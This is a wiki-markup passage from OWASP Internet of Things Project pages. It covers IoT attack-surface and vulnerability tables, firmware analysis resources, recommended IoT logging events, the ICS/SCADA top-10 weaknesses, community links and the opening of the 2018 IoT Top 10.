* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=File:OWASP_2018_IoT_Top10_Final.jpg&diff=246269File:OWASP 2018 IoT Top10 Final.jpg2018-12-26T04:26:24Z<p>Aaron.guzman: </p>
<hr />
<div>.</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246249OWASP Internet of Things Project2018-12-23T17:24:07Z<p>Aaron.guzman: /* OWASP Internet of Things (IoT) Project */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
